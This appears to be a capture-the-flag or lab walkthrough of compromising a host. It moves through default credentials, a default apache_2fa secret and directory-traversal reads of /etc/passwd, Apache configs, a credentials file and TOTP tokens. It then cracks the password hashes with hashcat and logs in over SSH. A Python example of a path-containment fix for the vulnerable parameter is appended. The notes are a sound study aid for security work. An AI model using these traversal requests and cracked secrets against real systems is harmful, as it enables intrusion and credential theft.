2 :80
http://192.168.76.144
Landing Page
| requires Basic Auth
# trying admin:admin works
http://192.168.76.144/auth/auth?/
Page to enter Auth token
# source shows
<!-- itemir/apache_2fa -->
# googling this takes me to
https://github.com/itemir/apache_2fa
# Under https://github.com/itemir/apache_2fa#instructions
# mentioned a default secret key ND4LKCSFMUQISO6CBZQATLDP
# using plugin https://addons.mozilla.org/en-US/firefox/addon/auth-helper/
# generated code and it works
http://192.168.76.144/?
Page showing jobs
Jobs: [ps aux | w | uptime]
# after running job
http://192.168.76.144/index.php?workon=am9iPXc=
# result is shown on a different page
http://192.168.76.144/spool/viewresult.php?view=192.168.49.76_1630813122.txt
# directory traversal is possible
http://192.168.76.144/spool/viewresult.php?view=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
fox:x:1000:1000::/home/fox:/bin/sh
# trying to run command via base64
doesn't work
# reading apache config file
http://192.168.76.144/spool/viewresult.php?view=/etc/apache2/apache2.conf
[truncated]
IncludeOptional sites-enabled/*.conf
# virtual host is enabled, getting that config
http://192.168.76.144/spool/viewresult.php?view=/etc/apache2/sites-available/000-default.conf
AuthType Basic
AuthName "offsec"
AuthUserFile /opt/apache_2fa/apache_credentials
Require valid-user
http://192.168.76.144/spool/viewresult.php?view=/opt/apache_2fa/apache_credentials
admin:$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1
fox:$apr1$JWr/q2vH$KXhhk03ukqkoXjbOIoUVp/
$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt --show
$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1:admin
$apr1$JWr/q2vH$KXhhk03ukqkoXjbOIoUVp/:THERESE
$ ssh fox@192.168.76.144
Password: THERESE
Verification code: ??
# asking for verification code means there is 2fa?
# tried the OTP, but not working
# Looking at the repo again to check what files might contain info
# https://github.com/itemir/apache_2fa
# auth | tokens.json
http://192.168.76.144/spool/viewresult.php?view=/opt/apache_2fa/auth
TOKEN_FILE = os.path.join(BASE_DIR, 'tokens.json')
http://192.168.76.144/spool/viewresult.php?view=/opt/apache_2fa/tokens.json
{
"admin": "ND4LKCSFMUQISO6CBZQATLDP",
"fox": "RTW2ARWLJZRWUCN54UO22FDQ6I"
}
# tried verification code as RTW2ARWLJZRWUCN54UO22FDQ6I
# didn't work
# maybe use that to generate OTP like before,
# works
$ ssh fox@192.168.76.144
Password: THERESE
Verification code: <OTP CODE w/ RTW2ARWLJZRWUCN54UO22FDQ6I>
You have mail.
$ whoami;id;hostname;uname -a
fox
uid=1000(fox) gid=1000(fox) groups=1000(fox)
g00g
Linux g00g 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
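
Every file read above went through `viewresult.php?view=`, which accepted absolute paths outside the spool directory. The check below is an added example, not code from the target or from apache_2fa, showing how such a parameter can be confined to the spool directory; it is sketched in Python because the source of viewresult.php is not shown here. Assumptions: the names `resolve_result`, `RESULT_NAME` and `demo`, the result-name pattern (inferred from the one file name in these notes), and the constructed temporary spool directory.

```python
import os
import re
import tempfile

# Result names in the notes look like 192.168.49.76_1630813122.txt:
# client IPv4, underscore, epoch seconds, ".txt". Allow only that shape (assumed).
RESULT_NAME = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}_\d{1,10}\.txt", re.ASCII)


def resolve_result(view, spool_dir):
    """Return the real path of a result file inside spool_dir, or None."""
    if not isinstance(view, str) or not RESULT_NAME.fullmatch(view):
        return None  # rejects "/etc/passwd", "../x", empty values, NUL bytes
    base = os.path.realpath(spool_dir)
    candidate = os.path.realpath(os.path.join(base, view))
    # realpath follows symlinks, so a link inside the spool directory
    # that points outside it fails the containment check below.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Run the check against constructed inputs in a temporary spool dir."""
    with tempfile.TemporaryDirectory() as spool:
        good = "192.168.49.76_1630813122.txt"
        with open(os.path.join(spool, good), "w") as fh:
            fh.write("constructed job output\n")
        # Constructed symlink with a valid-looking name that escapes the spool.
        link = "10.0.0.1_1.txt"
        os.symlink("/etc/passwd", os.path.join(spool, link))
        requests = [good, link, "/etc/passwd", "../../etc/passwd",
                    "/opt/apache_2fa/tokens.json"]
        return {v: resolve_result(v, spool) is not None for v in requests}


if __name__ == "__main__":
    for value, allowed in demo().items():
        print("ALLOW" if allowed else "DENY ", value)
```

The allow-list on the name does most of the work; the `realpath` containment check is the second layer that still holds if the pattern is ever loosened.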